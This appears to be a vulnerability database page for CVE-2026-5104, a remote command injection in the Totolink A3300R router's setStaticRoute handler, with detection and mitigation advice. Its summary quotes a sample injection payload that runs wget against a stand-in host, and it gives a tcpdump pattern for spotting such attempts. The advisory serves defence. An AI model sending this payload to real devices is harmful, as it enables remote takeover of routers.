CVE-2026-5104
Received Received - Intake
Remote Command Injection in Totolink A3300R setStaticRoute Function

Publication date: 2026-03-30

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security vulnerability has been detected in Totolink A3300R 17.0.0cu.557_b20221024. Impacted is the function setStaticRoute of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument ip leads to command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-30
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-03-30
EPSS Evaluated
2026-06-15
NVD
CVE-2026-5104
EUVD
EUVD-2026-17054
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a3300r_firmware 17.0.0cu.557_b20221024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-5104 is a command injection vulnerability in the TOTOLINK A3300R router, version 17.0.0cu.557_b20221024. It occurs in the setStaticRoute function of the /cgi-bin/cstecgi.cgi file, where the user-supplied "ip" parameter is improperly handled. This parameter is passed to a function that formats it into a buffer and then executes it as a system command. Because of this, an attacker can remotely send specially crafted requests that include malicious commands in the "ip" parameter, causing the router to execute arbitrary operating system commands.

For example, an attacker can send an HTTP POST request with a JSON payload containing a command like `;wget 192.168.6.1:6666/testpoc`, which the router will execute, allowing remote code execution.

Impact Analysis

This vulnerability allows remote attackers to execute arbitrary commands on the affected TOTOLINK A3300R router. This can lead to unauthorized control over the device, enabling attackers to manipulate network traffic, install malware, steal sensitive information, or disrupt network operations.

Because the exploit can be performed remotely without user interaction, it poses a significant security risk to any network using the vulnerable router firmware.

Detection Guidance

This vulnerability can be detected by monitoring HTTP POST requests to the endpoint /cgi-bin/cstecgi.cgi that contain suspicious payloads in the "ip" parameter. Specifically, look for command injection patterns such as backticks (`), semicolons (;), or other shell metacharacters within the "ip" argument.

An example detection method is to capture and analyze network traffic for POST requests with JSON payloads containing the "ip" parameter with suspicious values.

A sample command to detect such attempts using tcpdump and grep could be:

  • tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i 'ip.*[`;]'

Alternatively, inspecting web server logs for POST requests to /cgi-bin/cstecgi.cgi containing suspicious "ip" parameter values can help identify exploitation attempts.

Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks only, such as via firewall rules or access control lists.

Disabling remote management or the affected service (shttpd) if possible can reduce exposure.

Monitor and block suspicious HTTP POST requests containing command injection patterns in the "ip" parameter.

Apply any available firmware updates or patches from the vendor addressing this vulnerability.

Compliance Impact

The CVE-2026-5104 vulnerability allows remote attackers to execute arbitrary commands on the TOTOLINK A3300R router due to command injection in the setStaticRoute function. This remote code execution risk can lead to unauthorized access, data breaches, or manipulation of sensitive information.

Such security weaknesses can impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches. Exploitation of this vulnerability could result in violations of these regulations due to potential data compromise or loss of system integrity.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-5104. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart